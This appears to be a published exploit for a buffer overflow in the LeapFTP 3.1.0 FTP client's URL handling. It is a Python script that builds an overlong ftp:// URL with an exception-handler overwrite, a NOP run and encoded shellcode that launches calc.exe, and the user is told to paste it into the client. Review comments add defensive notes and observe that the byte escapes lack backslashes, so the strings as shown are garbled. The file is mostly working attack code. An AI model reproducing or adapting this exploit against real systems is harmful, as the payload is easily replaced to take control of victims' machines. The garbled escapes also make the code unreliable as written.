
LeapFTP 3.1.0 URL Handling Buffer Overflow

Posted on 03 September 2014

# Exploit Title: LeapFTP 3.1.0 URL Handling SEH Exploit
# Google Dork: "k3170makan is totally awesome" hehehe
# Date: 2014-08-28
# Exploit Author: k3170makan
# Vendor Homepage: http://www.leapware.com/
# Software Link: http://www.leapware.com/download.html
# Version: 3.1.0
# Tested on: Windows XP SP0 (DoS on Windows SP2, Windows 7)
# Timeline:
# * 2014-08-28 : Initial disclosure
# * 2014-09-01 : no contact
# * 2014-09-01 : public disclosure
"""
This vulnerability was disclosed according to the terms of my public disclosure policy ( http://blog.k3170makan.com/p/public-disclosure-policy.html)
"""
# Proof-of-concept generator for the LeapFTP 3.1.0 URL-handling overflow
# described in the header above.  Running it writes ONE local file,
# exploit.txt, holding an "ftp://" URL built from a long filler run, a
# short handler-overwrite sequence, a NOP run and an encoded payload (the
# author's msfpayload line says the payload only launches calc.exe).
# The script opens no socket and sends no FTP traffic.
#
# NOTE(review): every byte string below reads "x90", "xEB", ... with no
# backslash, so as shown the script emits those as plain ASCII characters,
# not the byte values the inline comments name.  Presumably the "\x"
# escapes were lost in extraction; the strings are left exactly as found.
#
# Defender's view: the trigger is a single URL over 1 KB long fed to the
# client's URL handler, which is easy to spot and to reject by length.
# The header reports only a crash (DoS) on XP SP2 and Windows 7 rather
# than code execution; presumably the exception-handler hardening on
# those platforms stops the technique -- confirm.  Upgrading past 3.1.0
# or validating URL length in the handler removes the condition.
from sys import argv  # unused: the script reads no command-line arguments
if __name__ == "__main__":
    # Filler length before the overwritten handler record, per the header
    # (the author's measured offset; not verifiable from this file alone).
    ovTrigger = 1093
    f = open("exploit.txt","w")
    f.write("ftp://")
    f.write("A"*ovTrigger)
    f.write("xEBx06x90x90") #JMP to payload
    # NOTE(review): hard-coded address; the "Tested on" line above suggests
    # it is specific to Windows XP SP0.
    f.write("x44xD3x4Ax77") #POP POP RET
    f.write("x90"*30) # NOP run placed directly ahead of the payload
    #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/alpha_mixed -c 1 -b x00x0ax0dxff
    # Alphanumeric-encoded (x86/alpha_mixed) payload with 0x00/0x0a/0x0d/0xff
    # excluded, so it survives being carried inside a URL string.
    shellcode = "x89xe0xd9xe8xd9x70xf4x5fx57x59x49x49x49x49" + "x49x49x49x49x49x49x43x43x43x43x43x43x37x51" + "x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" + "x41x42x32x42x42x30x42x42x41x42x58x50x38x41" + "x42x75x4ax49x49x6cx68x68x4fx79x35x50x53x30" + "x45x50x35x30x6ex69x79x75x30x31x6ax72x30x64" + "x4cx4bx53x62x56x50x4ex6bx76x32x56x6cx6cx4b" + "x42x72x62x34x6ex6bx54x32x46x48x76x6fx6ex57" + "x61x5ax67x56x45x61x39x6fx64x71x4bx70x4ex4c" + "x55x6cx53x51x33x4cx67x72x76x4cx51x30x59x51" + "x38x4fx64x4dx45x51x49x57x4dx32x58x70x56x32" + "x70x57x4ex6bx31x42x76x70x4ex6bx61x52x47x4c" + "x73x31x5ax70x4cx4bx57x30x53x48x6cx45x4fx30" + "x33x44x51x5ax65x51x48x50x42x70x6ex6bx72x68" + "x67x68x6cx4bx30x58x47x50x77x71x5ax73x49x73" + "x77x4cx71x59x6ex6bx35x64x4ex6bx57x71x4bx66" + "x35x61x4bx4fx34x71x4fx30x4ex4cx59x51x4ax6f" + "x74x4dx75x51x58x47x44x78x59x70x62x55x68x74" + "x33x33x61x6dx4bx48x65x6bx33x4dx47x54x72x55" + "x58x62x36x38x6ex6bx32x78x35x74x55x51x4ax73" + "x73x56x4ex6bx66x6cx72x6bx6ex6bx71x48x77x6c" + "x47x71x78x53x6ex6bx73x34x4ex6bx75x51x5ax70" + "x4bx39x77x34x35x74x71x34x31x4bx51x4bx75x31" + "x71x49x70x5ax66x31x4bx4fx39x70x43x68x43x6f" + "x53x6ax4cx4bx42x32x38x6bx4bx36x53x6dx42x4a" + "x36x61x4cx4dx4bx35x68x39x65x50x35x50x55x50" + "x70x50x52x48x76x51x6cx4bx62x4fx6cx47x79x6f" + "x6ex35x6fx4bx4ax50x4ex55x69x32x32x76x55x38" + "x79x36x6cx55x6fx4dx4dx4dx6bx4fx78x55x75x6c" + "x73x36x31x6cx57x7ax4bx30x79x6bx49x70x70x75" + "x64x45x4fx4bx63x77x37x63x62x52x52x4fx52x4a" + "x77x70x56x33x69x6fx4ex35x30x63x35x31x50x6c" + "x51x73x36x4ex45x35x44x38x33x55x53x30x41x41"
    f.write(shellcode)
    f.flush()
    f.close()
    #copy contents of exploit.txt to your clipboard and then launch LeapFTP
    # <http://about.me/k3170makan> Keith Makan <http://about.me/k3170makan> about.me/k3170makan <http://about.me/k3170makan>

 
